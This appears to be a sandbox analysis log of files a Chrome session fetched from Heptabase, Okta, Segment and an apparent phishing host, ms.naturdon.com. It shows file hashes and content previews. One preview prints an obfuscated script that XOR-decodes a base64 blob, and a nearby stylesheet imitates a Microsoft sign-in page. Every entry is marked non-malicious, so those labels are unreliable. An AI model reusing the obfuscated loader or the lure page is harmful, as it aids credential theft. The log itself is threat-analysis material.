                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):268
                                                                                                                                                                                                                        Entropy (8bit):5.111190711619041
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                                                                                                        SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                                                                                                        SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                                                                                                        SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (549)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):613
                                                                                                                                                                                                                        Entropy (8bit):5.4231176807280566
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2A09328DC543636641FE771A5E97992E
                                                                                                                                                                                                                        SHA1:1C3433CAEFC98CCD3F9A2540E8612B49468AAD2F
                                                                                                                                                                                                                        SHA-256:384777346879D9D1AC1DDAEBC92DC3E8A93BBC67D8D39FBEFC8293080F2C1A05
                                                                                                                                                                                                                        SHA-512:3B91CBA8D5793182E93B82EAE68F0C63AEB22222F903CF7C1F971C28D0FFE637FDEB994A0019E6F55C68CF06650BE8BD021473D1E8FE2AEBDC4397484E578339
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/_commonjs-dynamic-modules-5cb9de4b.js
                                                                                                                                                                                                                        Preview:(function(){try{var e=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},r=new Error().stack;r&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[r]="f7347c51-89c7-48bf-9cfa-30d2f1057038",e._sentryDebugIdIdentifier="sentry-dbid-f7347c51-89c7-48bf-9cfa-30d2f1057038")}catch{}})();function o(e){throw new Error('Could not dynamically require "'+e+'". Please configure the dynamicRequireTargets or/and ignoreDynamicRequires option of @rollup/plugin-commonjs appropriately for this require call to work.')}export{o as c};.//# sourceMappingURL=_commonjs-dynamic-modules-5cb9de4b.js.map.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):26765
                                                                                                                                                                                                                        Entropy (8bit):5.114987586674101
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:1A862A89D5633FAC83D763886726740D
                                                                                                                                                                                                                        SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                                                                                                                                                        SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                                                                                                                                                        SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/56m71bBBEdPnDabIvGt3p8916
                                                                                                                                                                                                                        Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (418)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):464
                                                                                                                                                                                                                        Entropy (8bit):5.468150665318195
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:B487EC52C5AA7067A863E72D0B1A891D
                                                                                                                                                                                                                        SHA1:3D9259E1B194D63389AA1EA298EBD9FB82C7D364
                                                                                                                                                                                                                        SHA-256:0BC1F452DFB3FB7B2340C0E6F18CD69813968A1A1DE2748D7B48D3084A32B0F7
                                                                                                                                                                                                                        SHA-512:00F2071D5679A55D27C900A7F49D1D270E7677C5D4CCF815A4927D90E06B88AB0E463B549EEF26EF81D12B352037DFE48FF2232A9C379207ECA0BA7390AE6034
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/helpers-28f3a226.js
                                                                                                                                                                                                                        Preview:(function(){try{var e=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},t=new Error().stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="69d9c79c-44fa-4f32-9f2f-96c2187c500e",e._sentryDebugIdIdentifier="sentry-dbid-69d9c79c-44fa-4f32-9f2f-96c2187c500e")}catch{}})();function f(e){return Object.prototype.toString.call(e).slice(8,-1).toLowerCase()==="object"}export{f as i};.//# sourceMappingURL=helpers-28f3a226.js.map.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (19869), with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):24896
                                                                                                                                                                                                                        Entropy (8bit):5.880418638765803
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:D64855D08E5DE41E15806530F7FB829C
                                                                                                                                                                                                                        SHA1:C318F9372FF942F85D25E5E7F1B990D014B0B963
                                                                                                                                                                                                                        SHA-256:901465532F41DD799CB8B772C6659F9923B52738A07957B61D367169D3422EC8
                                                                                                                                                                                                                        SHA-512:6FF3251C05B3316DA58A62AD37C12F40B2BF8E72823C232F322DAF45D8A31EA0D41656D72AED44D40543AE371638D4692C5BFC6EADB80831C9D9F8763D9B5260
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/iVYo/
                                                                                                                                                                                                                        Preview:<script>..function EtHBjpCwtr(wefRYqibgI, PKuDDXWTOX) {..let nGbaDZOFfn = '';..wefRYqibgI = atob(wefRYqibgI);..let dlsfotUvXD = PKuDDXWTOX.length;..for (let i = 0; i < wefRYqibgI.length; i++) {.. nGbaDZOFfn += String.fromCharCode(wefRYqibgI.charCodeAt(i) ^ PKuDDXWTOX.charCodeAt(i % dlsfotUvXD));..}..return nGbaDZOFfn;..}..var ArMRypHxoL = EtHBjpCwtr(`eT8GOAE5B04ZQyZxRyIcPQMdUB5qLwouDWcZHx9UNzVLKQckXAQbRCA+HGdbZ0VAWh8oJQtkAjpRUFYeNi8XIxg9TWNgDTYvFyMYPVMdGFJ4bg0+HDkAVEUeJigLIBtnEAIFRCEqCSsaLF0NBVxqLQ8rEGYfBwhCai8XMxg9HEMAQmp4S3tGeFwNGEg1OApnAjpdAwNfayYWaFZ1XB0JQyw8EXRlQ35kVkImPgw6HHd+ZARUMmwjPwYqBwcFX20tESUKYVQPPWgiByJ/AC0eAgRoHR4TKQF8QDQ9ey4vCCZaEysnDVcNOwIuWiUGNC0IdgAIBAArNBY7UAIKEC4vcAcnIkl9BS0uGCsePBxVPHkDKS8hGwwEYzMuNghQLzAsH2gdFhUQWg9DDFl4MCg9BAQqGCgEaxJ5VQYFJQY3WEl0FiIcEgIwJClVHQYSAwEiAyciQgsPDAsPADAvDXgGDQIuWiUGNC0IdgAIMh4QQShaUBJ1EAMseRQnB3csLlYcWAYeJBloEnkXAwI6PS0EAQsPCBgeEEA4HmsSeVUGBQ8YNC9ndxYyf1gdNAIQVQIaEBAwABwnB0UpKTIYHi1BWgN9Bg4ILj98GQotXTMuDAsHEys0BlMrHRUDIDo9LQNwIgUm
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):25216
                                                                                                                                                                                                                        Entropy (8bit):7.947339442168474
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                                                                                                                                                        SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                                                                                                                                                        SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                                                                                                                                                        SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4171)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4220
                                                                                                                                                                                                                        Entropy (8bit):5.252791018746943
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:BFCAA2BD88528E167572B789DFEE5AA2
                                                                                                                                                                                                                        SHA1:543EAD6ABFDA3CB5651DCA1265201EBA5A992CF1
                                                                                                                                                                                                                        SHA-256:9A773B748DFB8E650581F83AA0710F5BC72111A50FF444A178130966BAF5ABB6
                                                                                                                                                                                                                        SHA-512:D982450E069984910DB5240FDB5CD4AE9C52B6F6DDA7F1866269C7666B4E20201A65C9E67D52C25CE14133C214CB94A110D6E3499678491E011D19588EF91E48
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://cdn.segment.com/next-integrations/actions/amplitude-plugins/5843404183e0e2708588.js
                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e,t,n={},r={};function i(e){var t=r[e];if(void 0!==t)return t.exports;var o=r[e]={exports:{}};return n[e](o,o.exports,i),o.exports}i.m=n,i.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return i.d(t,{a:t}),t},i.d=(e,t)=>{for(var n in t)i.o(t,n)&&!i.o(e,n)&&Object.defineProperty(e,n,{enumerable:!0,get:t[n]})},i.f={},i.e=e=>Promise.all(Object.keys(i.f).reduce(((t,n)=>(i.f[n](e,t),t)),[])),i.u=e=>e+"/449cd4534726259c2a8c.js",i.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),i.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),e={},t="Destination:",i.l=(n,r,o,s)=>{if(e[n])e[n].push(r);else{var a,l;if(void 0!==o)for(var c=document.getElementsByTagName("script"),u=0;u<c.length;u++){var d=c[u];if(d.getAttribute("src")==n||d.getAttribute("data-webpack")==t+o){a=d;break}}a||(l=!0,(a=document.createElement("script")).charset="utf-8",a.timeout=120,i.nc&&a.setA
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):35970
                                                                                                                                                                                                                        Entropy (8bit):7.989503040923577
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                                                                                                        SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                                                                                                        SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                                                                                                        SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-bold.woff
                                                                                                                                                                                                                        Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:C source, ASCII text, with very long lines (8950)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):8951
                                                                                                                                                                                                                        Entropy (8bit):5.249546962897631
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:5EDA21C9B6B3B06345764A7EC4875339
                                                                                                                                                                                                                        SHA1:20491064DF229ACF4AA6F19BA1CDAA1BA1592CFF
                                                                                                                                                                                                                        SHA-256:25E981AF19A91C1003CC882C1D86232CD65017739FFA8573990DD0CE2022E3E7
                                                                                                                                                                                                                        SHA-512:5ECEA33AD0A047BC9A88093949CC90A4F6C112E459EC4F5C88A78ED9B3A8839ECB8E3405EE8F66E3C6E1E217FB278586D487FDEC73F55E7B1A9934BB07B98AD2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://get.heptabase.com/pr/js
                                                                                                                                                                                                                        Preview:!function(){"use strict";var o="https://grsm.io",r="https://partnerlinks.io";function e(o){return"string"!=typeof o?"":decodeURIComponent(atob(o).split("").map((function(o){return"%"+("00"+o.charCodeAt(0).toString(16)).slice(-2)})).join(""))}var n,t,s=(n=function(o,r){var e;e=function(){function o(){for(var o=0,r={};o<arguments.length;o++){var e=arguments[o];for(var n in e)r[n]=e[n]}return r}function r(o){return o.replace(/(%[0-9A-Z]{2})+/g,decodeURIComponent)}return function e(n){function t(){}function s(r,e,s){if("undefined"!=typeof document){"number"==typeof(s=o({path:"/"},t.defaults,s)).expires&&(s.expires=new Date(1*new Date+864e5*s.expires)),s.expires=s.expires?s.expires.toUTCString():"";try{var a=JSON.stringify(e);/^[\{\[]/.test(a)&&(e=a)}catch(o){}e=n.write?n.write(e,r):encodeURIComponent(String(e)).replace(/%(23|24|26|2B|3A|3C|3E|3D|2F|3F|40|5B|5D|5E|60|7B|7D|7C)/g,decodeURIComponent),r=encodeURIComponent(String(r)).replace(/%(23|24|26|2B|5E|60|7C)/g,decodeURIComponent).replac
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2331)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2332
                                                                                                                                                                                                                        Entropy (8bit):4.961659065847883
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:0780E55024FCD88D9E77A8C6C7744D18
                                                                                                                                                                                                                        SHA1:E062A7F004C0951D5D66B342A38DCF998047B606
                                                                                                                                                                                                                        SHA-256:FF2AF54829B37A2E68D96490B60C7B1489F6ABFE02435524C8A747C2F904CDDC
                                                                                                                                                                                                                        SHA-512:E6018E70DEC93289CEF43C3EC4817D15E0FE2F7CF1B447D2F96CB1A83320854D2B256CABC508A1FBC16DAA706EA366C79133AA9FCFD0EDC36B144DFB404B8C7A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/accountApi-ff2af548.css
                                                                                                                                                                                                                        Preview:._block_oewjo_1{position:var(--block-display)}._block_oewjo_1:after{pointer-events:none;position:absolute;top:0;right:0;bottom:0;left:0;border-radius:3px;background-color:transparent;transition-property:background-color;transition-duration:.15s;transition-duration:0s;transition-timing-function:cubic-bezier(.4,0,.2,1);--tw-content: "";content:var(--tw-content)}._block_oewjo_1._selecting_oewjo_7:after{background-color:var(--middle-transparent-blue);transition-duration:.2s}._block_oewjo_1._mobileSelecting_oewjo_10:after{border-radius:3px;background-color:var(--middle-transparent-blue)}._block_oewjo_1:after ._toBeDropped_oewjo_13{background-color:var(--bg-middle-transparent-blue)!important}._block_oewjo_1._selecting_oewjo_7,._block_oewjo_1._mobileSelecting_oewjo_10{position:relative}._block_oewjo_1._selecting_oewjo_7 *::-moz-selection,._block_oewjo_1._selecting_oewjo_7::-moz-selection,._block_oewjo_1._mobileSelecting_oewjo_10 *::-moz-selection,._block_oewjo_1._mobileSelecting_oewjo_10::-mo
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10450)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):10498
                                                                                                                                                                                                                        Entropy (8bit):5.327380141461276
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                                                                                                                        SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                                                                                                                        SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                                                                                                                        SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                                                                                                                        Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8966)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):9014
                                                                                                                                                                                                                        Entropy (8bit):5.480597558873754
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:664CEB6F1347D144892ADD56205C0D0D
                                                                                                                                                                                                                        SHA1:9F2B503AED9C3281C1E8BEEFAFBC7C5D37B6413B
                                                                                                                                                                                                                        SHA-256:0120C50D0F0111CB7335734D30D217B2757F816C2498E64887BAA96DE34ECC31
                                                                                                                                                                                                                        SHA-512:2B8BFB159D7F5B7121B9AFB021437C0030D186C7D0A53EFBF43A67F08E8F25AB119E7E300EDB5EED41600CEB8FDD3E455639A8035975EDBB7B9326F16FAEF764
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/spark-md5-9953c3d1.js
                                                                                                                                                                                                                        Preview:import{as as D}from"./accountApi-672c2e6f.js";(function(){try{var a=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},b=new Error().stack;b&&(a._sentryDebugIds=a._sentryDebugIds||{},a._sentryDebugIds[b]="82bb2b0d-1242-40a8-b97c-e8cbeb4e5fe4",a._sentryDebugIdIdentifier="sentry-dbid-82bb2b0d-1242-40a8-b97c-e8cbeb4e5fe4")}catch{}})();function F(a,b){for(var y=0;y<b.length;y++){const p=b[y];if(typeof p!="string"&&!Array.isArray(p)){for(const h in p)if(h!=="default"&&!(h in a)){const l=Object.getOwnPropertyDescriptor(p,h);l&&Object.defineProperty(a,h,l.get?l:{enumerable:!0,get:()=>p[h]})}}}return Object.freeze(Object.defineProperty(a,Symbol.toStringTag,{value:"Module"}))}var v={exports:{}};(function(a,b){(function(y){a.exports=y()})(function(y){var p=["0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"];function h(i,f){var r=i[0],t=i[1],n=i[2],e=i[3];r+=(t&n|~t&e)+f[0]-680876936|0,r=(r<<7|r>>>25)+t|0,e+=(r&t|~r&n)+f[1]-389564586|0,e=(e<<12|e>>>20)+r|0,n+=
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12225)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):12273
                                                                                                                                                                                                                        Entropy (8bit):5.2964481184814876
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:CD86BDB48B14F60DE7C2319F02102D87
                                                                                                                                                                                                                        SHA1:AE391472053B1081761DCA3356B9357EBA2FD7AD
                                                                                                                                                                                                                        SHA-256:B31AF838146C4FA3DAE386C55775522602AA4974F66484196C1FC0BDF6C22C65
                                                                                                                                                                                                                        SHA-512:4F6B8BCDA09E0A53F00344ACF9C964E33FD13B116B9668EF623FB341A3855F873B50D45B5B3B9F6CD9E4F42386B2B71D0C4B08E1E544F6D03B6DF9A923A6B01B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/GuestPage-39686c92.js
                                                                                                                                                                                                                        Preview:import{L as W,cY as re,l as x,j as s,aJ as K,am as z,ej as de,h as J,ae as le,d0 as me,b as E,d5 as ue,d6 as pe,gk as he,tD as u,g as D,ck as H,iu as F,hC as fe,ec as ye,sK as ge,tR as ve,xZ as be,dH as Ie,k as Te,kG as xe,xS as Ne,Q as De,gj as Ee,u1 as We,ui as Pe,uk as Me,ul as Ce,um as ke,uj as Se,u2 as je,u3 as Re,u7 as we,u8 as _e,u4 as Fe,ug as Le,uz as $e,un as Ge,uA as He,uh as Be,uo as Ke,uf as ze,ux as Je,up as Ze,uq as Oe,ur as qe,us as Ae,ut as Ue,u6 as Ve,u5 as Qe,dJ as Ye,x_ as Xe,x$ as et,dk as tt,bT as at,y0 as st,ta as nt,l3 as it,e as ot}from"./accountApi-672c2e6f.js";import{aZ as ct,a_ as Z,a7 as O,be as rt,eM as dt,eN as lt,eO as mt,eP as ut,a$ as L,b0 as pt,a9 as p,b1 as ht,b2 as ft,aU as $,eQ as M,aX as yt,aY as gt,aT as C,b3 as vt,aL as bt,aq as It,U as Tt,bb as xt,a8 as Nt,eR as Dt,c6 as Et,c2 as Wt,ek as Pt,eS as Mt,eT as Ct,eU as kt,dc as St}from"./main-4c0c8700.js";import jt from"./GuestError-26f258d6.js";import{b as Rt,I as wt,C as _t,a as Ft,l as Lt,q as $
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19
                                                                                                                                                                                                                        Entropy (8bit):3.576617644908667
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:980021208D52C1907A8256F57F077691
                                                                                                                                                                                                                        SHA1:CC2EF6376333CDFB4E18210689B4FFAE4FD60C39
                                                                                                                                                                                                                        SHA-256:B5865D15F4439D43678F8F1165CA58106C42C0F1AFF9419DFC642FA4DCDAC269
                                                                                                                                                                                                                        SHA-512:ABC045334B3A69A098E0D5AC0F391F389350432E8090C379829C3E7722FB991CC19E1F419CF3A150FC8A9351D359C0C6944AE2D782FFE7C24A4B4027A6111028
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RBAC: access denied
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
